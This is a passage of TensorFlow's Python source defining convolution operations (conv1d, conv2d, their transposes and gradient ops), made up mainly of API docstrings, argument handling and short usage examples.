padding: the `padding` argument for a Python op which supports EXPLICIT
padding.
expected_length: Expected number of entries in the padding list when
explicit padding is used.
Returns:
(padding, explicit_paddings) pair, which should be passed as attributes to a
C++ op.
Raises:
ValueError: If padding is invalid.
"""
explicit_paddings = []
if padding == "EXPLICIT":
# Give a better error message if EXPLICIT is passed.
raise ValueError('"EXPLICIT" is not a valid value for the padding '
"parameter. To use explicit padding, the padding "
"parameter must be a list.")
if isinstance(padding, (list, tuple)):
for i, dim_paddings in enumerate(padding):
if not isinstance(dim_paddings, (list, tuple)):
raise ValueError("When padding is a list, each element of padding must "
"be a list/tuple of size 2. Element with index %d of "
"padding is not a list/tuple" % i)
if len(dim_paddings) != 2:
raise ValueError("When padding is a list, each element of padding must "
"be a list/tuple of size 2. Element with index %d of "
"padding has size %d" % (i, len(dim_paddings)))
explicit_paddings.extend(dim_paddings)
if len(padding) != expected_length:
raise ValueError("When padding is a list, it must be of size %d. Got "
"padding of size: %d" % (expected_length, len(padding)))
padding = "EXPLICIT"
return padding, explicit_paddings
@tf_export(v1=["nn.conv1d"])
@dispatch.add_dispatch_support
@deprecation.deprecated_arg_values(
None,
"`NCHW` for data_format is deprecated, use `NCW` instead",
warn_once=True,
data_format="NCHW")
@deprecation.deprecated_arg_values(
None,
"`NHWC` for data_format is deprecated, use `NWC` instead",
warn_once=True,
data_format="NHWC")
def conv1d(
value=None,
filters=None,
stride=None,
padding=None,
use_cudnn_on_gpu=None,
data_format=None,
name=None,
input=None, # pylint: disable=redefined-builtin
dilations=None):
r"""Computes a 1-D convolution of input with rank `>=3` and a `3-D` filter.
Given an input tensor of shape
`batch_shape + [in_width, in_channels]`
if `data_format` is `"NWC"`, or
`batch_shape + [in_channels, in_width]`
if `data_format` is `"NCW"`,
and a filter / kernel tensor of shape
`[filter_width, in_channels, out_channels]`, this op reshapes
the arguments to pass them to `conv2d` to perform the equivalent
convolution operation.
Internally, this op reshapes the input tensors and invokes `tf.nn.conv2d`.
For example, if `data_format` does not start with "NC", a tensor of shape
`batch_shape + [in_width, in_channels]`
is reshaped to
`batch_shape + [1, in_width, in_channels]`,
and the filter is reshaped to
`[1, filter_width, in_channels, out_channels]`.
The result is then reshaped back to
`batch_shape + [out_width, out_channels]`
\(where out_width is a function of the stride and padding as in conv2d\) and
returned to the caller.
Args:
value: A Tensor of rank at least 3. Must be of type `float16`, `float32`, or
`float64`.
filters: A Tensor of rank at least 3. Must have the same type as `value`.
stride: An int or list of `ints` that has length `1` or `3`. The number of
entries by which the filter is moved right at each step.
padding: 'SAME' or 'VALID'
use_cudnn_on_gpu: An optional `bool`. Defaults to `True`.
data_format: An optional `string` from `"NWC", "NCW"`. Defaults to `"NWC"`,
the data is stored in the order of `batch_shape + [in_width,
in_channels]`. The `"NCW"` format stores data as `batch_shape +
[in_channels, in_width]`.
name: A name for the operation (optional).
input: Alias for value.
dilations: An int or list of `ints` that has length `1` or `3` which
defaults to 1. The dilation factor for each dimension of input. If set to
k > 1, there will be k-1 skipped cells between each filter element on that
dimension. Dilations in the batch and depth dimensions must be 1.
Returns:
A `Tensor`. Has the same type as input.
Raises:
ValueError: if `data_format` is invalid.
"""
value = deprecation.deprecated_argument_lookup("input", input, "value", value)
with ops.name_scope(name, "conv1d", [value, filters]) as name:
# Reshape the input tensor to batch_shape + [1, in_width, in_channels]
if data_format is None or data_format == "NHWC" or data_format == "NWC":
data_format = "NHWC"
spatial_start_dim = -3
channel_index = 2
elif data_format == "NCHW" or data_format == "NCW":
data_format = "NCHW"
spatial_start_dim = -2
channel_index = 1
else:
raise ValueError("data_format must be \"NWC\" or \"NCW\".")
strides = [1] + _get_sequence(stride, 1, channel_index, "stride")
dilations = [1] + _get_sequence(dilations, 1, channel_index, "dilations")
value = array_ops.expand_dims(value, spatial_start_dim)
filters = array_ops.expand_dims(filters, 0)
if value.shape.ndims in (4, 3, 2, 1, 0, None):
result = gen_nn_ops.conv2d(
value,
filters,
strides,
padding,
use_cudnn_on_gpu=use_cudnn_on_gpu,
data_format=data_format,
dilations=dilations,
name=name)
else:
result = squeeze_batch_dims(
value,
functools.partial(
gen_nn_ops.conv2d,
filter=filters,
strides=strides,
padding=padding,
use_cudnn_on_gpu=use_cudnn_on_gpu,
data_format=data_format,
dilations=dilations,
),
inner_rank=3,
name=name)
return array_ops.squeeze(result, [spatial_start_dim])
@tf_export("nn.conv1d", v1=[])
@dispatch.add_dispatch_support
def conv1d_v2(
input, # pylint: disable=redefined-builtin
filters,
stride,
padding,
data_format="NWC",
dilations=None,
name=None):
r"""Computes a 1-D convolution given 3-D input and filter tensors.
Given an input tensor of shape
`batch_shape + [in_width, in_channels]`
if `data_format` is `"NWC"`, or
`batch_shape + [in_channels, in_width]`
if `data_format` is `"NCW"`,
and a filter / kernel tensor of shape
`[filter_width, in_channels, out_channels]`, this op reshapes
the arguments to pass them to `conv2d` to perform the equivalent
convolution operation.
Internally, this op reshapes the input tensors and invokes `tf.nn.conv2d`.
For example, if `data_format` does not start with `"NC"`, a tensor of shape
`batch_shape + [in_width, in_channels]`
is reshaped to
`batch_shape + [1, in_width, in_channels]`,
and the filter is reshaped to
`[1, filter_width, in_channels, out_channels]`.
The result is then reshaped back to
`batch_shape + [out_width, out_channels]`
\(where out_width is a function of the stride and padding as in conv2d\) and
returned to the caller.
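A minimal usage sketch (illustrative shapes only):

```python
import tensorflow as tf

x = tf.random.normal([4, 100, 8])   # [batch, in_width, in_channels]
w = tf.random.normal([5, 8, 16])    # [filter_width, in_channels, out_channels]
y = tf.nn.conv1d(x, w, stride=1, padding="SAME")
# `y` has shape [4, 100, 16].
```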
Args:
input: A Tensor of rank at least 3. Must be of type `float16`, `float32`, or
`float64`.
filters: A Tensor of rank at least 3. Must have the same type as `input`.
stride: An int or list of `ints` that has length `1` or `3`. The number of
entries by which the filter is moved right at each step.
padding: 'SAME' or 'VALID'
data_format: An optional `string` from `"NWC", "NCW"`. Defaults to `"NWC"`,
the data is stored in the order of
`batch_shape + [in_width, in_channels]`. The `"NCW"` format stores data
as `batch_shape + [in_channels, in_width]`.
dilations: An int or list of `ints` that has length `1` or `3` which
defaults to 1. The dilation factor for each dimension of input. If set to
k > 1, there will be k-1 skipped cells between each filter element on that
dimension. Dilations in the batch and depth dimensions must be 1.
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as input.
Raises:
ValueError: if `data_format` is invalid.
"""
return conv1d(
input, # pylint: disable=redefined-builtin
filters,
stride,
padding,
use_cudnn_on_gpu=True,
data_format=data_format,
name=name,
dilations=dilations)
@tf_export("nn.conv1d_transpose")
@dispatch.add_dispatch_support
def conv1d_transpose(
input, # pylint: disable=redefined-builtin
filters,
output_shape,
strides,
padding="SAME",
data_format="NWC",
dilations=None,
name=None):
"""The transpose of `conv1d`.
This operation is sometimes called "deconvolution" after
(Zeiler et al., 2010), but is actually the transpose (gradient) of `conv1d`
rather than an actual deconvolution.
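A minimal usage sketch (illustrative shapes only):

```python
import tensorflow as tf

x = tf.random.normal([2, 50, 16])   # [batch, in_width, in_channels]
w = tf.random.normal([5, 8, 16])    # [filter_width, output_channels, in_channels]
y = tf.nn.conv1d_transpose(x, w, output_shape=[2, 100, 8], strides=2)
# With "SAME" padding and stride 2, `y` has shape [2, 100, 8].
```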
Args:
input: A 3-D `Tensor` of type `float` and shape
`[batch, in_width, in_channels]` for `NWC` data format or
`[batch, in_channels, in_width]` for `NCW` data format.
filters: A 3-D `Tensor` with the same type as `input` and shape
`[filter_width, output_channels, in_channels]`. `filter`'s
`in_channels` dimension must match that of `input`.
output_shape: A 1-D `Tensor`, containing three elements, representing the
output shape of the deconvolution op.
strides: An int or list of `ints` that has length `1` or `3`. The number of
entries by which the filter is moved right at each step.
padding: A string, either `'VALID'` or `'SAME'`. The padding algorithm.
See the "returns" section of `tf.nn.convolution` for details.
data_format: A string. `'NWC'` and `'NCW'` are supported.
dilations: An int or list of `ints` that has length `1` or `3` which
defaults to 1. The dilation factor for each dimension of input. If set to
k > 1, there will be k-1 skipped cells between each filter element on that
dimension. Dilations in the batch and depth dimensions must be 1.
name: Optional name for the returned tensor.
Returns:
A `Tensor` with the same type as `input`.
Raises:
ValueError: If input/output depth does not match `filter`'s shape, if
`output_shape` is not a 3-element vector, if `padding` is other than
`'VALID'` or `'SAME'`, or if `data_format` is invalid.
References:
Deconvolutional Networks:
[Zeiler et al., 2010]
(https://ieeexplore.ieee.org/abstract/document/5539957)
([pdf]
(http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.232.4023&rep=rep1&type=pdf))
"""
with ops.name_scope(name, "conv1d_transpose",
[input, filters, output_shape]) as name:
# The format could be either NWC or NCW, map to NHWC or NCHW
if data_format is None or data_format == "NWC":
data_format = "NHWC"
spatial_start_dim = 1
channel_index = 2
elif data_format == "NCW":
data_format = "NCHW"
spatial_start_dim = 2
channel_index = 1
else:
raise ValueError("data_format must be \"NWC\" or \"NCW\".")
# Reshape the input tensor to [batch, 1, in_width, in_channels]
strides = [1] + _get_sequence(strides, 1, channel_index, "stride")
dilations = [1] + _get_sequence(dilations, 1, channel_index, "dilations")
input = array_ops.expand_dims(input, spatial_start_dim)
filters = array_ops.expand_dims(filters, 0)
output_shape = list(output_shape) if not isinstance(
output_shape, ops.Tensor) else output_shape
output_shape = array_ops.concat([output_shape[: spatial_start_dim], [1],
output_shape[spatial_start_dim:]], 0)
result = gen_nn_ops.conv2d_backprop_input(
input_sizes=output_shape,
filter=filters,
out_backprop=input,
strides=strides,
padding=padding,
data_format=data_format,
dilations=dilations,
name=name)
return array_ops.squeeze(result, spatial_start_dim)
@tf_export("nn.conv2d", v1=[])
@dispatch.add_dispatch_support
def conv2d_v2(input, # pylint: disable=redefined-builtin
filters,
strides,
padding,
data_format="NHWC",
dilations=None,
name=None):
# pylint: disable=line-too-long
r"""Computes a 2-D convolution given `input` and 4-D `filters` tensors.
The `input` tensor may have rank `4` or higher, where shape dimensions `[:-3]`
are considered batch dimensions (`batch_shape`).
Given an input tensor of shape
`batch_shape + [in_height, in_width, in_channels]` and a filter / kernel
tensor of shape `[filter_height, filter_width, in_channels, out_channels]`,
this op performs the following:
1. Flattens the filter to a 2-D matrix with shape
`[filter_height * filter_width * in_channels, output_channels]`.
2. Extracts image patches from the input tensor to form a *virtual*
tensor of shape `[batch, out_height, out_width,
filter_height * filter_width * in_channels]`.
3. For each patch, right-multiplies the filter matrix and the image patch
vector.
In detail, with the default NHWC format,
output[b, i, j, k] =
sum_{di, dj, q} input[b, strides[1] * i + di, strides[2] * j + dj, q] *
filter[di, dj, q, k]
Must have `strides[0] = strides[3] = 1`. For the most common case of the same
horizontal and vertical strides, `strides = [1, stride, stride, 1]`.
Usage Example:
>>> x_in = np.array([[
... [[2], [1], [2], [0], [1]],
... [[1], [3], [2], [2], [3]],
... [[1], [1], [3], [3], [0]],
... [[2], [2], [0], [1], [1]],
... [[0], [0], [3], [1], [2]], ]])
>>> kernel_in = np.array([
... [ [[2, 0.1]], [[3, 0.2]] ],
... [ [[0, 0.3]],[[1, 0.4]] ], ])
>>> x = tf.constant(x_in, dtype=tf.float32)
>>> kernel = tf.constant(kernel_in, dtype=tf.float32)
>>> tf.nn.conv2d(x, kernel, strides=[1, 1, 1, 1], padding='VALID')
<tf.Tensor: shape=(1, 4, 4, 2), dtype=float32, numpy=..., dtype=float32)>
Args:
input: A `Tensor`. Must be one of the following types:
`half`, `bfloat16`, `float32`, `float64`.
A Tensor of rank at least 4. The dimension order is interpreted according
to the value of `data_format`; with the all-but-inner-3 dimensions acting
as batch dimensions. See below for details.
filters: A `Tensor`. Must have the same type as `input`.
A 4-D tensor of shape
`[filter_height, filter_width, in_channels, out_channels]`
strides: An int or list of `ints` that has length `1`, `2` or `4`. The
stride of the sliding window for each dimension of `input`. If a single
value is given it is replicated in the `H` and `W` dimension. By default
the `N` and `C` dimensions are set to 1. The dimension order is determined
by the value of `data_format`, see below for details.
padding: Either the `string` `"SAME"` or `"VALID"` indicating the type of
padding algorithm to use, or a list indicating the explicit paddings at
the start and end of each dimension. When explicit padding is used and
data_format is `"NHWC"`, this should be in the form `[[0, 0], [pad_top,
pad_bottom], [pad_left, pad_right], [0, 0]]`. When explicit padding used
and data_format is `"NCHW"`, this should be in the form `[[0, 0], [0, 0],
[pad_top, pad_bottom], [pad_left, pad_right]]`.
data_format: An optional `string` from: `"NHWC", "NCHW"`.
Defaults to `"NHWC"`.
Specify the data format of the input and output data. With the
default format "NHWC", the data is stored in the order of:
`batch_shape + [height, width, channels]`.
Alternatively, the format could be "NCHW", the data storage order of:
`batch_shape + [channels, height, width]`.
    dilations: An int or list of `ints` that has length `1`, `2` or `4`,
      defaults to 1. The dilation factor for each dimension of `input`. If a
      single value is given it is replicated in the `H` and `W` dimension. By
      default the `N` and `C` dimensions are set to 1. If set to k > 1, there
      will be k-1 skipped cells between each filter element on that dimension.
      The dimension order is determined by the value of `data_format`, see
      above for details. If a 4-d tensor is given, the dilations in the batch
      and depth dimensions must be 1.
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `input` and the same outer batch shape.
"""
# pylint: enable=line-too-long
return conv2d(input, # pylint: disable=redefined-builtin
filters,
strides,
padding,
use_cudnn_on_gpu=True,
data_format=data_format,
dilations=dilations,
name=name)
@tf_export(v1=["nn.conv2d"])
@dispatch.add_dispatch_support
def conv2d( # pylint: disable=redefined-builtin,dangerous-default-value
input,
filter=None,
strides=None,
padding=None,
use_cudnn_on_gpu=True,
data_format="NHWC",
dilations=[1, 1, 1, 1],
name=None,
filters=None):
r"""Computes a 2-D convolution given 4-D `input` and `filter` tensors.
Given an input tensor of shape `[batch, in_height, in_width, in_channels]`
and a filter / kernel tensor of shape
`[filter_height, filter_width, in_channels, out_channels]`, this op
performs the following:
1. Flattens the filter to a 2-D matrix with shape
`[filter_height * filter_width * in_channels, output_channels]`.
2. Extracts image patches from the input tensor to form a *virtual*
tensor of shape `[batch, out_height, out_width,
filter_height * filter_width * in_channels]`.
3. For each patch, right-multiplies the filter matrix and the image patch
vector.
In detail, with the default NHWC format,
output[b, i, j, k] =
sum_{di, dj, q} input[b, strides[1] * i + di, strides[2] * j + dj, q]
* filter[di, dj, q, k]
Must have `strides[0] = strides[3] = 1`. For the most common case of the same
horizontal and vertical strides, `strides = [1, stride, stride, 1]`.
Args:
input: A `Tensor`. Must be one of the following types:
`half`, `bfloat16`, `float32`, `float64`.
A 4-D tensor. The dimension order is interpreted according to the value
of `data_format`, see below for details.
filter: A `Tensor`. Must have the same type as `input`.
A 4-D tensor of shape
`[filter_height, filter_width, in_channels, out_channels]`
strides: An int or list of `ints` that has length `1`, `2` or `4`. The
stride of the sliding window for each dimension of `input`. If a single
value is given it is replicated in the `H` and `W` dimension. By default
the `N` and `C` dimensions are set to 1. The dimension order is determined
by the value of `data_format`, see below for details.
padding: Either the `string` `"SAME"` or `"VALID"` indicating the type of
padding algorithm to use, or a list indicating the explicit paddings at
the start and end of each dimension. When explicit padding is used and
data_format is `"NHWC"`, this should be in the form `[[0, 0], [pad_top,
pad_bottom], [pad_left, pad_right], [0, 0]]`. When explicit padding used
and data_format is `"NCHW"`, this should be in the form `[[0, 0], [0, 0],
[pad_top, pad_bottom], [pad_left, pad_right]]`.
use_cudnn_on_gpu: An optional `bool`. Defaults to `True`.
data_format: An optional `string` from: `"NHWC", "NCHW"`.
Defaults to `"NHWC"`.
Specify the data format of the input and output data. With the
default format "NHWC", the data is stored in the order of:
[batch, height, width, channels].
Alternatively, the format could be "NCHW", the data storage order of:
[batch, channels, height, width].
    dilations: An int or list of `ints` that has length `1`, `2` or `4`,
      defaults to 1. The dilation factor for each dimension of `input`. If a
      single value is given it is replicated in the `H` and `W` dimension. By
      default the `N` and `C` dimensions are set to 1. If set to k > 1, there
      will be k-1 skipped cells between each filter element on that dimension.
      The dimension order is determined by the value of `data_format`, see
      above for details. If a 4-d tensor is given, the dilations in the batch
      and depth dimensions must be 1.
name: A name for the operation (optional).
filters: Alias for filter.
Returns:
A `Tensor`. Has the same type as `input`.
"""
filter = deprecation.deprecated_argument_lookup(
"filters", filters, "filter", filter)
padding, explicit_paddings = convert_padding(padding)
if data_format is None:
data_format = "NHWC"
channel_index = 1 if data_format.startswith("NC") else 3
strides = _get_sequence(strides, 2, channel_index, "strides")
dilations = _get_sequence(dilations, 2, channel_index, "dilations")
shape = input.shape
# shape object may lack ndims, e.g., if input is an np.ndarray. In that case,
# we fall back to len(shape).
ndims = getattr(shape, "ndims", -1)
if ndims == -1:
ndims = len(shape)
if ndims in (4, 3, 2, 1, 0, None):
# We avoid calling squeeze_batch_dims to reduce extra python function
# call slowdown in eager mode. This branch doesn't require reshapes.
return gen_nn_ops.conv2d(
input,
filter=filter,
strides=strides,
padding=padding,
use_cudnn_on_gpu=use_cudnn_on_gpu,
explicit_paddings=explicit_paddings,
data_format=data_format,
dilations=dilations,
name=name)
return squeeze_batch_dims(
input,
functools.partial(
gen_nn_ops.conv2d,
filter=filter,
strides=strides,
padding=padding,
use_cudnn_on_gpu=use_cudnn_on_gpu,
explicit_paddings=explicit_paddings,
data_format=data_format,
dilations=dilations),
inner_rank=3,
name=name)
@tf_export(v1=["nn.conv2d_backprop_filter"])
@dispatch.add_dispatch_support
def conv2d_backprop_filter( # pylint: disable=redefined-builtin,dangerous-default-value
input,
filter_sizes,
out_backprop,
strides,
padding,
use_cudnn_on_gpu=True,
data_format="NHWC",
dilations=[1, 1, 1, 1],
name=None):
r"""Computes the gradients of convolution with respect to the filter.
Args:
input: A `Tensor`. Must be one of the following types:
`half`, `bfloat16`, `float32`, `float64`.
4-D with shape `[batch, in_height, in_width, in_channels]`.
filter_sizes: A `Tensor` of type `int32`.
An integer vector representing the tensor shape of `filter`,
where `filter` is a 4-D
`[filter_height, filter_width, in_channels, out_channels]` tensor.
out_backprop: A `Tensor`. Must have the same type as `input`.
4-D with shape `[batch, out_height, out_width, out_channels]`.
Gradients w.r.t. the output of the convolution.
strides: A list of `ints`.
The stride of the sliding window for each dimension of the input
of the convolution. Must be in the same order as the dimension specified
with format.
padding: Either the `string` `"SAME"` or `"VALID"` indicating the type of
padding algorithm to use, or a list indicating the explicit paddings at
the start and end of each dimension. When explicit padding is used and
data_format is `"NHWC"`, this should be in the form `[[0, 0], [pad_top,
pad_bottom], [pad_left, pad_right], [0, 0]]`. When explicit padding used
and data_format is `"NCHW"`, this should be in the form `[[0, 0], [0, 0],
[pad_top, pad_bottom], [pad_left, pad_right]]`.
use_cudnn_on_gpu: An optional `bool`. Defaults to `True`.
data_format: An optional `string` from: `"NHWC", "NCHW"`.
Defaults to `"NHWC"`.
Specify the data format of the input and output data. With the
default format "NHWC", the data is stored in the order of:
[batch, in_height, in_width, in_channels].
Alternatively, the format could be "NCHW", the data storage order of:
[batch, in_channels, in_height, in_width].
dilations: An optional list of `ints`. Defaults to `[1, 1, 1, 1]`.
1-D tensor of length 4. The dilation factor for each dimension of
`input`. If set to k > 1, there will be k-1 skipped cells between each
filter element on that dimension. The dimension order is determined by
the value of `data_format`, see above for details. Dilations in the batch
and depth dimensions must be 1.
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `input`.
"""
padding, explicit_paddings = convert_padding(padding)
return gen_nn_ops.conv2d_backprop_filter(
input, filter_sizes, out_backprop, strides, padding, use_cudnn_on_gpu,
explicit_paddings, data_format, dilations, name)
@tf_export(v1=["nn.conv2d_backprop_input"])
@dispatch.add_dispatch_support
def conv2d_backprop_input( # pylint: disable=redefined-builtin,dangerous-default-value
input_sizes,
filter=None,
out_backprop=None,
strides=None,
padding=None,
use_cudnn_on_gpu=True,
data_format="NHWC",
dilations=[1, 1, 1, 1],
name=None,
filters=None):
r"""Computes the gradients of convolution with respect to the input.
Args:
input_sizes: A `Tensor` of type `int32`.
An integer vector representing the shape of `input`,
where `input` is a 4-D `[batch, height, width, channels]` tensor.
filter: A `Tensor`. Must be one of the following types:
`half`, `bfloat16`, `float32`, `float64`.
4-D with shape
`[filter_height, filter_width, in_channels, out_channels]`.
out_backprop: A `Tensor`. Must have the same type as `filter`.
4-D with shape `[batch, out_height, out_width, out_channels]`.
Gradients w.r.t. the output of the convolution.
strides: A list of `ints`.
The stride of the sliding window for each dimension of the input
of the convolution. Must be in the same order as the dimension specified
with format.
padding: Either the `string` `"SAME"` or `"VALID"` indicating the type of
padding algorithm to use, or a list indicating the explicit paddings at
the start and end of each dimension. When explicit padding is used and
data_format is `"NHWC"`, this should be in the form `[[0, 0], [pad_top,
pad_bottom], [pad_left, pad_right], [0, 0]]`. When explicit padding used
and data_format is `"NCHW"`, this should be in the form `[[0, 0], [0, 0],
[pad_top, pad_bottom], [pad_left, pad_right]]`.
use_cudnn_on_gpu: An optional `bool`. Defaults to `True`.
data_format: An optional `string` from: `"NHWC", "NCHW"`.
Defaults to `"NHWC"`.
Specify the data format of the input and output data. With the
default format "NHWC", the data is stored in the order of:
[batch, in_height, in_width, in_channels].
Alternatively, the format could be "NCHW", the data storage order of:
[batch, in_channels, in_height, in_width].
dilations: An optional list of `ints`. Defaults to `[1, 1, 1, 1]`.
1-D tensor of length 4. The dilation factor for each dimension of
`input`. If set to k > 1, there will be k-1 skipped cells between each
filter element on that dimension. The dimension order is determined by
the value of `data_format`, see above for details. Dilations in the batch
and depth dimensions must be 1.
name: A name for the operation (optional).
filters: Alias for filter.
Returns:
A `Tensor`. Has the same type as `filter`.
"""
filter = deprecation.deprecated_argument_lookup(
"filters", filters, "filter", filter)
padding, explicit_paddings = convert_padding(padding)
return gen_nn_ops.conv2d_backprop_input(
input_sizes, filter, out_backprop, strides, padding, use_cudnn_on_gpu,
explicit_paddings, data_format, dilations, name)
@tf_export(v1=["nn.conv2d_transpose"])
@dispatch.add_dispatch_support
def conv2d_transpose(
value=None,
filter=None, # pylint: disable=redefined-builtin
output_shape=None,
strides=None,
padding="SAME",
data_format="NHWC",
name=None,
input=None, # pylint: disable=redefined-builtin
filters=None,
dilations=None):
"""The transpose of `conv2d`.
This operation is sometimes called "deconvolution" after
(Zeiler et al., 2010), but is really the transpose (gradient) of `conv2d`
rather than an actual deconvolution.
Args:
value: A 4-D `Tensor` of type `float` and shape
`[batch, height, width, in_channels]` for `NHWC` data format or
`[batch, in_channels, height, width]` for `NCHW` data format.
filter: A 4-D `Tensor` with the same type as `value` and shape
`[height, width, output_channels, in_channels]`. `filter`'s
`in_channels` dimension must match that of `value`.
output_shape: A 1-D `Tensor` representing the output shape of the
deconvolution op.
strides: An int or list of `ints` that has length `1`, `2` or `4`. The
stride of the sliding window for each dimension of `input`. If a single
value is given it is replicated in the `H` and `W` dimension. By default
      the `N` and `C` dimensions are set to 1. The dimension order is determined
by the value of `data_format`, see below for details.
padding: A string, either `'VALID'` or `'SAME'`. The padding algorithm.
See the "returns" section of `tf.nn.convolution` for details.
data_format: A string. 'NHWC' and 'NCHW' are supported.
name: Optional name for the returned tensor.
input: Alias for value.
filters: Alias for filter.
    dilations: An int or list of `ints` that has length `1`, `2` or `4`,
      defaults to 1. The dilation factor for each dimension of `input`. If a
      single value is given it is replicated in the `H` and `W` dimension. By
      default the `N` and `C` dimensions are set to 1. If set to k > 1, there
      will be k-1 skipped cells between each filter element on that dimension.
      The dimension order is determined by the value of `data_format`, see
      above for details. If a 4-d tensor is given, the dilations in the batch
      and depth dimensions must be 1.
Returns:
A `Tensor` with the same type as `value`.
Raises:
ValueError: If input/output depth does not match `filter`'s shape, or if
padding is other than `'VALID'` or `'SAME'`.
References:
Deconvolutional Networks:
[Zeiler et al., 2010]
(https://ieeexplore.ieee.org/abstract/document/5539957)
([pdf]
(http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.232.4023&rep=rep1&type=pdf))
"""
value = deprecated_argument_lookup("input", input, "value", value)
filter = deprecated_argument_lookup("filters", filters, "filter", filter)
with ops.name_scope(name, "conv2d_transpose",
[value, filter, output_shape]) as name:
return conv2d_transpose_v2(
value,
filter,
output_shape,
strides,
padding=padding,
data_format=data_format,
dilations=dilations,
name=name)
@tf_export("nn.conv2d_transpose", v1=[])
@dispatch.add_dispatch_support
def conv2d_transpose_v2(
input, # pylint: disable=redefined-builtin
filters, # pylint: disable=redefined-builtin
output_shape,
strides,
padding="SAME",
data_format="NHWC",
dilations=None,
name=None):
"""The transpose of `conv2d`.
This operation is sometimes called "deconvolution" after
(Zeiler et al., 2010), but is really the transpose (gradient) of
  `conv2d` rather than an actual deconvolution.
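  A small illustrative example (arbitrary all-ones tensors) with the default
  `'SAME'` padding, where the output simply takes the requested `output_shape`:
  >>> x = tf.ones([1, 4, 4, 3])   # [batch, height, width, in_channels]
  >>> f = tf.ones([3, 3, 8, 3])   # [height, width, output_channels, in_channels]
  >>> tf.nn.conv2d_transpose(x, f, output_shape=[1, 8, 8, 8], strides=2).shape
  TensorShape([1, 8, 8, 8])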
Args:
input: A 4-D `Tensor` of type `float` and shape `[batch, height, width,
in_channels]` for `NHWC` data format or `[batch, in_channels, height,
width]` for `NCHW` data format.
filters: A 4-D `Tensor` with the same type as `input` and shape `[height,
width, output_channels, in_channels]`. `filter`'s `in_channels` dimension
must match that of `input`.
output_shape: A 1-D `Tensor` representing the output shape of the
deconvolution op.
strides: An int or list of `ints` that has length `1`, `2` or `4`. The
stride of the sliding window for each dimension of `input`. If a single
value is given it is replicated in the `H` and `W` dimension. By default
      the `N` and `C` dimensions are set to 1. The dimension order is determined
by the value of `data_format`, see below for details.
padding: Either the `string` `"SAME"` or `"VALID"` indicating the type of
padding algorithm to use, or a list indicating the explicit paddings at
the start and end of each dimension. When explicit padding is used and
data_format is `"NHWC"`, this should be in the form `[[0, 0], [pad_top,
pad_bottom], [pad_left, pad_right], [0, 0]]`. When explicit padding used
and data_format is `"NCHW"`, this should be in the form `[[0, 0], [0, 0],
[pad_top, pad_bottom], [pad_left, pad_right]]`.
data_format: A string. 'NHWC' and 'NCHW' are supported.
    dilations: An int or list of `ints` that has length `1`, `2` or `4`,
      defaults to 1. The dilation factor for each dimension of `input`. If a
      single value is given it is replicated in the `H` and `W` dimension. By
      default the `N` and `C` dimensions are set to 1. If set to k > 1, there
      will be k-1 skipped cells between each filter element on that dimension.
      The dimension order is determined by the value of `data_format`, see
      above for details. If a 4-d tensor is given, the dilations in the batch
      and depth dimensions must be 1.
name: Optional name for the returned tensor.
Returns:
A `Tensor` with the same type as `input`.
Raises:
ValueError: If input/output depth does not match `filter`'s shape, or if
padding is other than `'VALID'` or `'SAME'`.
References:
Deconvolutional Networks:
[Zeiler et al., 2010]
(https://ieeexplore.ieee.org/abstract/document/5539957)
([pdf]
(http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.232.4023&rep=rep1&type=pdf))
"""
with ops.name_scope(name, "conv2d_transpose",
                      [input, filters, output_shape]) as name:
if data_format is None:
data_format = "NHWC"
channel_index = 1 if data_format.startswith("NC") else 3
strides = _get_sequence(strides, 2, channel_index, "strides")
dilations = _get_sequence(dilations, 2, channel_index, "dilations")
padding, explicit_paddings = convert_padding(padding)
return gen_nn_ops.conv2d_backprop_input(
input_sizes=output_shape,
filter=filters,
out_backprop=input,
strides=strides,
padding=padding,
explicit_paddings=explicit_paddings,
data_format=data_format,
dilations=dilations,
name=name)
def _conv2d_expanded_batch(
input, # pylint: disable=redefined-builtin
filters,
strides,
padding,
data_format,
dilations,
name):
"""Helper function for `convolution_internal`; handles expanded batches."""
# Try really hard to avoid modifying the legacy name scopes - return early.
input_rank = input.shape.rank
if input_rank is None or input_rank < 5:
# We avoid calling squeeze_batch_dims to reduce extra python function
# call slowdown in eager mode. This branch doesn't require reshapes.
return gen_nn_ops.conv2d(
input,
filter=filters,
strides=strides,
padding=padding,
data_format=data_format,
dilations=dilations,
name=name)
return squeeze_batch_dims(
input,
functools.partial(
gen_nn_ops.conv2d,
filter=filters,
strides=strides,
padding=padding,
data_format=data_format,
dilations=dilations),
inner_rank=3,
name=name)
@tf_export("nn.atrous_conv2d_transpose")
@dispatch.add_dispatch_support
def atrous_conv2d_transpose(value,
filters,
output_shape,
rate,
padding,
name=None):
"""The transpose of `atrous_conv2d`.
This operation is sometimes called "deconvolution" after
(Zeiler et al., 2010), but is really the transpose (gradient) of
`atrous_conv2d` rather than an actual deconvolution.
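  A small illustrative example (arbitrary all-ones tensors); with `'SAME'`
  padding the result takes the requested `output_shape`:
  >>> x = tf.ones([1, 8, 8, 3])
  >>> f = tf.ones([3, 3, 4, 3])   # [height, width, out_channels, in_channels]
  >>> tf.nn.atrous_conv2d_transpose(x, f, output_shape=[1, 8, 8, 4], rate=2,
  ...     padding='SAME').shape
  TensorShape([1, 8, 8, 4])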
Args:
value: A 4-D `Tensor` of type `float`. It needs to be in the default `NHWC`
format. Its shape is `[batch, in_height, in_width, in_channels]`.
filters: A 4-D `Tensor` with the same type as `value` and shape
`[filter_height, filter_width, out_channels, in_channels]`. `filters`'
`in_channels` dimension must match that of `value`. Atrous convolution is
equivalent to standard convolution with upsampled filters with effective
height `filter_height + (filter_height - 1) * (rate - 1)` and effective
width `filter_width + (filter_width - 1) * (rate - 1)`, produced by
inserting `rate - 1` zeros along consecutive elements across the
`filters`' spatial dimensions.
    output_shape: A 1-D `Tensor` representing the output shape of the
      deconvolution op.
rate: A positive int32. The stride with which we sample input values across
the `height` and `width` dimensions. Equivalently, the rate by which we
upsample the filter values by inserting zeros across the `height` and
`width` dimensions. In the literature, the same parameter is sometimes
called `input stride` or `dilation`.
padding: A string, either `'VALID'` or `'SAME'`. The padding algorithm.
name: Optional name for the returned tensor.
Returns:
A `Tensor` with the same type as `value`.
Raises:
ValueError: If input/output depth does not match `filters`' shape, or if
padding is other than `'VALID'` or `'SAME'`, or if the `rate` is less
